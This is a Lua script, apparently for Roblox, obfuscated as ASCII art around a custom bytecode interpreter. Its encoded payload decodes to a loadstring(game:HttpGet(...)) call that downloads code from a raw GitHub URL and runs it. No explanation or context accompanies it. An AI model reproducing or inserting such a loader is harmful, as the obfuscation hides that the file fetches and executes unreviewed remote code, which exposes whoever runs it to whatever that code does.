                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));   
                                                    return "";end end else local v83=0;local v84;while true do if (0==v83) then v84=v2(v0(v30,16) 
                                                  );if v19 then local v100=0;local v101;while true do if (v100==0) then v101=v5(v84,v19);v19=nil;   
                                                  v100=1;end if (v100==1) then return v101;end end else return v84;end break;end end end end);local   
                                                function v20(v31,v32,v33) if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86 
                                                =(v31/(2^(v32-(1 -0))))%((1639 -(1523 + 114))^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v86-(v86%(620 -(555  
                                              + 64))) ;end end else local v87=931 -(857 + 67 + 7) ;local v88;while true do if (v87==((809 -241) -(367 + 201 
                                              ))) then v88=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (877 -(282 +  
                                            595)) ;end end end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -( 
                                            226 + 232 + 812))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -((989 -(892 + 65)) 
                                           + 85)) ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 ;return (v37 * 
                                           (472 -216)) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (  
                                          v38==(1 -0)) then return (v42 * ((22064890 -5287324) -(87 + 263))) + (v41 * (176444 -110908)) + (v40 * (464 -(1395 -(1069 + 
                                           118)))) + v39 ;end if (v38==(180 -((151 -84) + (247 -134)))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + ((2 + 
                                         9) -(12 -5)) ;v38=2 -1 ;end end end local function v24() local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,1 
                                        ,20) * ((793 -(368 + 423))^32)) + v43 ;local v47=v20(v44,65 -44 ,49 - --[[==============================]](10 + 8) );local v48=(( 
                                        v20(v44,(7 + 115) -90 )==(443 -(147 + 269 + 26))) and  -1)  --[[============================================]]or ((888 -(261 +    
                                        624)) -2) ;if (v47==((859 -(814 + 45)) + 0)) then if (  --[[======================================================]]v46==(0 -0))    
                                      then return v48 * (0 -0) ;else local v92=(1598 -1160) --[[==========================================================]] -(145 + 293) ;   
                                      while true do if (v92==(430 -(44 + (1370 -984))))   --[[==============================================================]]then v47=1487 - 
                                      ((2078 -(1020 + 60)) + 488) ;v45=0 + 0 ;break;end   --[[================================================================]]end end elseif  
                                      (v47==(1677 + 370)) then return ((v46==((2195 -(630 --[[==================================================================]] + 793)) -(   
                                      201 + (1406 -835)))) and (v48 * ((1139 -(116 + 1022 --[[==================================================================]]))/(0 -0)))) or   
                                     (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + ( --[[====================================================================]]v46/((2 + 0)^ 
                    52))) ;end local function v25(v49) local v50;if  not v49 then v49=v23 --[[====================================================================]]();if (v49==(0  
              -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 +  --[[======================================================================]]v49 ;local    
            v51={};for v65=1, #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51) --[[======================================================================]];end local    
          v26=v23;local function v27(...) return {...},v12("#",...);end local function    --[[======================================================================]]v28() local   
        v52=(function() return 166 -(9 + 157) ;end)();local v53=(function() return;end)() --[[======================================================================]];local v54=(  
        function() return;end)();local v55=(function() return;end)();local v56=(function( --[[======================================================================]]) return;end) 
      ();local v57=(function() return;end)();local v58=(function() return;end)();while    --[[======================================================================]]true do local 
       v67=(function() return 0 -0 ;end)();while true do if (v67==(1824 -(1195 + 629)))     --[[==================================================================]]then if (v52==  
      #",") then local v97=(function() return 0 -0 ;end)();while true do if (v97~=1) then   --[[================================================================]]else for v113= #  
    "\\",v57 do local v114=(function() return 241 -(187 + 54) ;end)();local v115=(function( --[[==============================================================]]) return;end)();  
    local v116=(function() return;end)();local v117=(function() return;end)();while true do   --[[==========================================================]]if (v114~=1) then   
    else v117=(function() return nil;end)();while true do if (v115== #"{") then if (v116== #"]" --[[====================================================]]) then v117=(function() 
     return v21()~=(780 -(162 + 618)) ;end)();elseif (v116==2) then v117=(function() return v24() --[[==============================================]];end)();elseif (v116== #  
    "xxx") then v117=(function() return v25();end)();end v58[v113]=(function() return v117;end)();    --[[====================================]]break;end if (v115==(0 + 0))  
    then local v164=(function() return 0 + 0 ;end)();local v165=(function() return;end)();while true do   --[[========================]]if (v164==(0 -0)) then v165=(function 
    () return 0 -0 ;end)();while true do if (v165==(1 + 0)) then v115=(function() return  #">";end)();break;end if (v165==0) then v116=(function() return v21();end)();v117 
  =(function() return nil;end)();v165=(function() return 1637 -(1373 + 263) ;end)();end end break;end end end end break;end if (v114==(1000 -(451 + 549))) then v115=(    
  function() return 0;end)();v116=(function() return nil;end)();v114=(function() return 1 + 0 ;end)();end end end v56[ #"nil"]=(function() return v21();end)();v97=(    
  function() return 2 -0 ;end)();end if (2==v97) then v52=(function() return 2;end)();break;end if (v97==(0 -0)) then v57=(function() return v23();end)();v58=(function() 
   return {};end)();v97=(function() return 1385 -(746 + 638) ;end)();end end end if (v52==(0 + 0)) then local v98=(function() return 0 -0 ;end)();local v99=(function()   
  return;end)();while true do if (v98==(341 -(218 + 123))) then v99=(function() return 0;end)();while true do if (v99==2) then v52=(function() return  #"|";end)();break; 
  end if (v99==(1582 -(1535 + 46))) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v99=(function() return 2;end)();end if (v99~=0) 
   then else v53=(function() return {};end)();v54=(function() return {};end)();v99=(function() return 1;end)();end end break;end end end v67=(function() return 1 + 0 ;   
  end)();end if (v67==1) then if (v52==2) then for v102= #"|",v23() do local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() 
   return;end)();while true do if (v103==(0 + 0)) then local v118=(function() return 0;end)();while true do if (v118==0) then v104=(function() return 560 -(306 + 254) ;  
  end)();v105=(function() return nil;end)();v118=(function() return 1;end)();end if (v118==1) then v103=(function() return 1 + 0 ;end)();break;end end end if ((1 -0)==   
  v103) then while true do if (v104~=(1467 -(899 + 568))) then else v105=(function() return v21();end)();if (v20(v105, #":", #" ")~=0) then else local v158=(function()   
  return 0;end)();local v159=(function() return;end)();local v160=(function() return;end)();local v161=(function() return;end)();local v162=(function() return;end)();while 
   true do if (v158==1) then v161=(function() return nil;end)();v162=(function() return nil;end)();v158=(function() return 2 + 0 ;end)();end if (v158~=2) then else while   
  true do if (v159==(4 -2)) then local v169=(function() return 603 -(268 + 335) ;end)();local v170=(function() return;end)();while true do if (v169~=(290 -(60 + 230)))     
  then else v170=(function() return 572 -(426 + 146) ;end)();while true do if (v170~=0) then else if (v20(v161, #"|", #",")~= #"\\") then else v162[2]=(function() return   
  v58[v162[2]];end)();end if (v20(v161,1 + 1 ,2)~= #"|") then else v162[ #"91("]=(function() return v58[v162[ #"xnx"]];end)();end v170=(function() return 1;end)();end if ( 
  v170~=(1457 -(282 + 1174))) then else v159=(function() return  #"xxx";end)();break;end end break;end end end if (v159== #"91(") then if (v20(v161, #"-19", #"nil")== #"[" 
  ) then v162[ #"xnxx"]=(function() return v58[v162[ #"0313"]];end)();end v53[v102]=(function() return v162;end)();break;end if (v159~=(811 -(569 + 242))) then else local  
  v172=(function() return 0 -0 ;end)();while true do if (v172~=0) then else v160=(function() return v20(v105,2, #"xxx");end)();v161=(function() return v20(v105, #".com",1  
  + 5 );end)();v172=(function() return 1;end)();end if (v172==1) then v159=(function() return  #":";end)();break;end end end if (v159== #"<") then local v173=(function()   
  return 0;end)();local v174=(function() return;end)();while true do if (v173==(1024 -(706 + 318))) then v174=(function() return 0;end)();while true do if (v174==(1251 -(  
  721 + 530))) then v162=(function() return {v22(),v22(),nil,nil};end)();if (v160==(1271 -(945 + 326))) then local v178=(function() return 0;end)();local v179=(function()  
  return;end)();while true do if ((0 -0)==v178) then v179=(function() return 0;end)();while true do if (v179~=0) then else v162[ #"19("]=(function() return v22();end)();   
  v162[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v160== #",") then v162[ #"nil"]=(function() return v23();end)();elseif (v160==(2 + 0)) 
   then v162[ #"-19"]=(function() return v23() -(2^16) ;end)();elseif (v160== #"xnx") then local v184=(function() return 0;end)();local v185=(function() return;end)();   
  while true do if (v184~=(700 -(271 + 429))) then else v185=(function() return 0 + 0 ;end)();while true do if (v185==0) then v162[ #"asd"]=(function() return v23() -(2^ 
  16) ;end)();v162[ #"?id="]=(function() return v22();end)();break;end end break;end end end v174=(function() return 1501 -(1408 + 92) ;end)();end if (v174==1) then v159 
    =(function() return 1088 -(461 + 625) ;end)();break;end end break;end end end end break;end if (v158~=(1288 -(993 + 295))) then else local v168=(function() return 0; 
    end)();while true do if ((0 + 0)==v168) then v159=(function() return 1171 -(418 + 753) ;end)();v160=(function() return nil;end)();v168=(function() return 1 + 0 ;end) 
    ();end if (v168==1) then v158=(function() return 1 + 0 ;end)();break;end end end end end break;end end break;end end end for v106= #":",v23() do v54[v106-#"[" ]=(    
    function() return v28();end)();end return v56;end break;end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[1 + 1 ];local v64=v59[532 
       -(406 + 123) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1;local v73= -(1770 -(1749 + 20));local v74={};local v75={ 
      ...};local v76=v12("#",...) -(1323 -(1249 + 73)) ;local v77={};local v78={};for v89=0 + 0 ,v76 do if (v89>=v70) then v74[v89-v70 ]=v75[v89 + 1 ];else v78[v89]=   
      v75[v89 + (1146 -(466 + 679)) ];end end local v79=(v76-v70) + ((2 + 0) -1) ;local v80;local v81;while true do v80=v68[v72];v81=v80[2 -1 ];if ((518<902) and (v81  
        <=(1906 -(106 + 1794)))) then if ((2994>858) and (v81<=(1 + 1))) then if (v81<=(0 + 0)) then local v108=0 -0 ;local v109;while true do if (v108==0) then v109=  
        v80[5 -3 ];v78[v109]=v78[v109](v13(v78,v109 + (115 -(4 + 65 + 45)) ,v73));break;end end elseif ((1623<=1957) and (v81==(585 -(57 + 527)))) then local v119=1427 
         -(41 + 590 + 796) ;local v120;local v121;while true do if ((4412==4412) and (v119==(104 -(17 + 86)))) then v78[v120 + 1 + 0 ]=v121;v78[v120]=v121[v80[(5 + 3)  
          -4 ]];break;end if (v119==((0 -0) -0)) then v120=v80[168 -(122 + 44) ];v121=v78[v80[(13 -8) -2 ]];v119=1;end end else local v122=0 -0 ;local v123;local     
            v124;local v125;local v126;while true do if ((1750>=842) and (v122==(2 + 0))) then for v154=v123,v73 do local v155=0 + 0 ;while true do if (v155==((0 -0) 
               -0)) then v126=v126 + (66 -(30 + 35)) ;v78[v154]=v124[v126];break;end end end break;end if (((1 + 0)==v122) or (3755<=915)) then v73=(v125 + v123) -(  
                1258 -(1043 + 214)) ;v126=0 -0 ;v122=1214 -(323 + 889) ;end if ((0 -0)==v122) then v123=v80[582 -(361 + 219) ];v124,v125=v71(v78[v123](v13(v78,v123 + 
                   1 ,v80[3])));v122=321 -(53 + 267) ;end end end elseif ((3946>3743) and (4372>1850) and (v81<=(1 + 3))) then if ((232<821) and (v81>(416 -(15 +   
                      398)))) then v78[v80[(287 + 697) -(18 + 964) ]]();else v78[v80[(33 -26) -5 ]]=v61[v80[2 + 1 ]];end elseif (v81==(4 + 1)) then v78[v80[(1605 - 
                                  (239 + 514)) -(20 + 830) ]]();else do return;end end elseif (v81<=(8 + 1)) then if (v81<=((47 + 86) -(116 + 10))) then v78[v80[(  
                                      1330 -(797 + 532)) + 1 ]]=v80[741 -(542 + 196) ];elseif (v81==(17 -9)) then local v129=v80[1 + 1 ];local v130,v131=v71(v78[   
                                      v129](v13(v78,v129 + 1 + 0 ,v80[2 + 1 + 0 ])));v73=(v131 +            v129) -(1 + 0) ;local v132=0 -0 ;for v146=v129,v73 do   
                                      local v147=0;while true do if ((0 -(0 -0))==v147) then v132=          v132 + (1552 -(1126 + 425)) ;v78[v146]=v130[v132];    
                                      break;end end end else local v133=v80[407 -(118 + 287) ];v78[         v133]=v78[v133](v13(v78,v133 + 1 ,v73));end elseif (( 
                                      v81<=11) or (1335>=3306)) then if ((4844>2253) and (v81==(39          -(1231 -(373 + 829))))) then do return;end else v78[  
                                      v80[1123 -(118 + 1003) ]]=v61[v80[8 -(736 -(476 + 255)) ]];             end elseif ((452==452) and (v81==12)) then local    
                                      v137=v80[379 -(142 + 235) ];local v138=v78[v80[13 -10 ]];v78[           v137 + 1 + 0 ]=v138;v78[v137]=v138[v80[4]];else v78 
                                      [v80[979 -(553 + 424) ]]=v80[5 -2 ];end v72=v72 + 1 + 0 ;end            end;end return v29(v28(),{},v17)(...);end return  
                                        v15(                                                                                                                    
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7468616E796174686F6E627574686F6E672D61692F2D2F726566732F68656164732F6D61696E2F464Q6600083Q0012033Q00013Q001203000100023Q00200C00010001000300120D000300044Q0002000100039Q0000022Q00053Q000100012Q000A3Q00017Q00",v9(),...);
